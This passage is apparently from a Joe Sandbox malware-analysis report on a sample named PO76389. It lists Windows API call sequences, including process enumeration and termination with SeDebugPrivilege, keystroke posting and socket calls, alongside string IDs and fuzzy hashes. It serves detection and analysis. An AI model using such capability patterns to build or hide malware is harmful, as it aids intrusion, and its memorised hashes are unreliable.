                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004ECE26
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE2F
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004ECE4D
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE50
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE59
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004ECE70
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE73
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 38af01d8011ba52b9cf106d0f41927afc86cc0f343c11a9565068ae6da368aaa
                                                    • Instruction ID: 0a9f44b2fea007afce02ee9c7856a7a0d77ae2c9535f6f6cdb01481cd27c8bda
                                                    • Opcode Fuzzy Hash: 38af01d8011ba52b9cf106d0f41927afc86cc0f343c11a9565068ae6da368aaa
                                                    • Instruction Fuzzy Hash: D611E1B1510618BFF7102B759C8EF6A7A3DDB28755F110416F280AB1E0C9F26C41EAB8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: dc8c3bc2484494df215ae411c42fa0c8b78febaf329b1a539554b95706adde89
                                                    • Instruction ID: 28548877abbd76286d0968fbf20f673c2c0e1541b65aa61e0ff5104cbc452de9
                                                    • Opcode Fuzzy Hash: dc8c3bc2484494df215ae411c42fa0c8b78febaf329b1a539554b95706adde89
                                                    • Instruction Fuzzy Hash: A3E1CE71A00219ABDF10DFA8C881BAE7FB5BF49314F14862DF955AB2C1D774AD41CBA0
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00511B09
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00511B17
                                                    • __wsplitpath.LIBCMT ref: 00511B45
                                                      • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                    • _wcscat.LIBCMT ref: 00511B5A
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00511BD0
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00511BE2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID: hEV
                                                    • API String ID: 1380811348-3062041611
                                                    • Opcode ID: dbecbaa9d09f1df5e21954dbc534f44d84e06e624206324bb89f3afafe562344
                                                    • Instruction ID: cb35fd348e2fc6e9e683873610fc3efbc9102df3ceaa4cabe619c8969763ff73
                                                    • Opcode Fuzzy Hash: dbecbaa9d09f1df5e21954dbc534f44d84e06e624206324bb89f3afafe562344
                                                    • Instruction Fuzzy Hash: 47519071504700AFD320DF25C885EABBBECEF88718F00495EF58597291EB74E944CBA6
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00519926
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 0051993A
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00519954
                                                    • _wcscat.LIBCMT ref: 005199AF
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 005199C6
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005199F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 437ede79f787c69317d8d1972148ca2a6692cf98ac8f63e99a0ade23eebf1417
                                                    • Instruction ID: a42cfaa353b1b7005338ff622e9412badb50135efc17ad9887c4338b0bf06cd5
                                                    • Opcode Fuzzy Hash: 437ede79f787c69317d8d1972148ca2a6692cf98ac8f63e99a0ade23eebf1417
                                                    • Instruction Fuzzy Hash: D441AE71A00308ABEF219F64C895FEE7BB8FF08354F10482AF599A7291C7759DC48B64
                                                    APIs
                                                      • Part of subcall function 004F6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                      • Part of subcall function 004F6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                      • Part of subcall function 004F6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051168B
                                                    • GetLastError.KERNEL32 ref: 0051169E
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005116CA
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00511746
                                                    • GetLastError.KERNEL32(00000000), ref: 00511751
                                                    • CloseHandle.KERNEL32(00000000), ref: 00511786
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: 9e7c630327da6b48543070ba5d470143b1550bee0e0686faf720c5d8e115c981
                                                    • Instruction ID: 1eb86ef505602ed872884391c3e33117f074b7959e4c399b8468f83a1f78c56a
                                                    • Opcode Fuzzy Hash: 9e7c630327da6b48543070ba5d470143b1550bee0e0686faf720c5d8e115c981
                                                    • Instruction Fuzzy Hash: 9541AF75600201AFEB04EF55D8A1FADBBA5BF54708F08804EF6065F3D2DBB8A844CB59
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 004F62D6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 78449a5c8099dc1d741ca912957dea60fc8541185f4c5c43618c2e2bca983c69
                                                    • Instruction ID: 292c5fe835724ebda9d3f3bdd9346cb9c4f89559db1e160efd372bede5090ffd
                                                    • Opcode Fuzzy Hash: 78449a5c8099dc1d741ca912957dea60fc8541185f4c5c43618c2e2bca983c69
                                                    • Instruction Fuzzy Hash: 4511A83120834ABAD7056B65DC52D7F67A8EF16724B22006FFA01673C2E7A87A41416D
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 004F7595
                                                    • LoadStringW.USER32(00000000), ref: 004F759C
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004F75B2
                                                    • LoadStringW.USER32(00000000), ref: 004F75B9
                                                    • _wprintf.LIBCMT ref: 004F75DF
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F75FD
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 004F75DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 3e52a45db354d8dfdff6611faf4ac495ffec18a6797d7f229a23850c6d5f01dd
                                                    • Instruction ID: e70adbbf75480f94710d1ff2b5b56ba6fe7f08df2b2eb43dc5a6bf15eff132bf
                                                    • Opcode Fuzzy Hash: 3e52a45db354d8dfdff6611faf4ac495ffec18a6797d7f229a23850c6d5f01dd
                                                    • Instruction Fuzzy Hash: 1D0136F2500208BFE711A794ED89EF7777CD704305F000496B745D2151EA789E889B75
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512AE7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3479070676-0
                                                    • Opcode ID: c4fa7cadd7275b1bb644f580892dcbe1c0c2f8bd00c944fb21ddb9dc25aeb2e0
                                                    • Instruction ID: 4a1f7d5a9441ab59b68eea5d55a15ba9d706d2f4894b8ad173ccc6afb82463b7
                                                    • Opcode Fuzzy Hash: c4fa7cadd7275b1bb644f580892dcbe1c0c2f8bd00c944fb21ddb9dc25aeb2e0
                                                    • Instruction Fuzzy Hash: 10919B31204201AFDB00EF15C895BAEBBE5BF84318F04880EF586872A1DB74ED95DF96
                                                    APIs
                                                    • select.WS2_32 ref: 00509B38
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509B45
                                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00509B6F
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509B9F
                                                    • htons.WS2_32(?), ref: 00509C51
                                                    • inet_ntoa.WS2_32(?), ref: 00509C0C
                                                      • Part of subcall function 004EE0F5: _strlen.LIBCMT ref: 004EE0FF
                                                      • Part of subcall function 004EE0F5: _memmove.LIBCMT ref: 004EE121
                                                    • _strlen.LIBCMT ref: 00509CA7
                                                    • _memmove.LIBCMT ref: 00509D10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                    • String ID:
                                                    • API String ID: 3637404534-0
                                                    • Opcode ID: 3f334173469a957de0b68e8712db8a379abf749f8859e7fc76319be0b7766756
                                                    • Instruction ID: 8c1819c00c2dbb0656e16e3f5a6bafe14125e5cccd21f092fee04a91f6ed647d
                                                    • Opcode Fuzzy Hash: 3f334173469a957de0b68e8712db8a379abf749f8859e7fc76319be0b7766756
                                                    • Instruction Fuzzy Hash: DF81AD32508200ABD714EF25DC85FAFBBB8FB84718F10491EF5558B292DB34D904CBA6
                                                    APIs
                                                    • __mtinitlocknum.LIBCMT ref: 004DB744
                                                      • Part of subcall function 004D8A0C: __FF_MSGBANNER.LIBCMT ref: 004D8A21
                                                      • Part of subcall function 004D8A0C: __NMSG_WRITE.LIBCMT ref: 004D8A28
                                                      • Part of subcall function 004D8A0C: __malloc_crt.LIBCMT ref: 004D8A48
                                                    • __lock.LIBCMT ref: 004DB757
                                                    • __lock.LIBCMT ref: 004DB7A3
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00566948,00000018,004E6C2B,?,00000000,00000109), ref: 004DB7BF
                                                    • RtlEnterCriticalSection.NTDLL(8000000C), ref: 004DB7DC
                                                    • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 004DB7EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1422805418-0
                                                    • Opcode ID: 4b7d8d7a3e2c1c9766dd025b09fe6d55d910ae35311fa1ea9302ab93cb361fd9
                                                    • Instruction ID: 41dd022488ceffe05175b7e54df20c1849f86023545bcc0c741709fc003914b3
                                                    • Opcode Fuzzy Hash: 4b7d8d7a3e2c1c9766dd025b09fe6d55d910ae35311fa1ea9302ab93cb361fd9
                                                    • Instruction Fuzzy Hash: 43413371E00205CBEB10AF69E864369B7B4EF01329F12821FF428AB3D1D77898459BD9
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 004FA1CE
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004FA205
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 004FA221
                                                    • _memmove.LIBCMT ref: 004FA26F
                                                    • _memmove.LIBCMT ref: 004FA28C
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004FA29B
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004FA2B0
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA2CF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: b263d2bbf12c627007550704262e8f0f5c5ab020a111ecbe9eec69fd1ca08a18
                                                    • Instruction ID: 543d731446a1a0d36cd4473124dc78a0309cba1f023c6026ab1687dbd3ba68dd
                                                    • Opcode Fuzzy Hash: b263d2bbf12c627007550704262e8f0f5c5ab020a111ecbe9eec69fd1ca08a18
                                                    • Instruction Fuzzy Hash: 9F31CE31A00105EBCB00DF95DC85AAFBBB8EF44310F1040AAF904AB346C775D918DBA5
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 00518CF3
                                                    • GetDC.USER32(00000000), ref: 00518CFB
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00518D06
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00518D12
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00518D4E
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00518D5F
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0051BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00518D99
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00518DB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                    • Instruction ID: ba1bc707c7fe2d0811eb37a07fdfcd6aa0839609be4e19580226d2b71cd5353d
                                                    • Opcode Fuzzy Hash: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                    • Instruction Fuzzy Hash: 4D316B72200614BBEB208F50EC8AFEA3FB9EF59755F084055FE089A291DA759841DBB0
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                    • _wcstok.LIBCMT ref: 00501D6E
                                                    • _wcscpy.LIBCMT ref: 00501DFD
                                                    • _memset.LIBCMT ref: 00501E30
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X$t:Vp:V
                                                    • API String ID: 774024439-3188185075
                                                    • Opcode ID: 642cdddc0c014b93f8cabe59e52b7497b86c3e9e3b53c403a9ff2a80d7281ad5
                                                    • Instruction ID: fe4aa5e030cedfff2bf78e06f33212750797675830eeb5f7343cf751b82de45c
                                                    • Opcode Fuzzy Hash: 642cdddc0c014b93f8cabe59e52b7497b86c3e9e3b53c403a9ff2a80d7281ad5
                                                    • Instruction Fuzzy Hash: F4C182355087019FC314EF25C881A9EBBE4FF85314F00496EF89A972A2DB34ED05CBA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
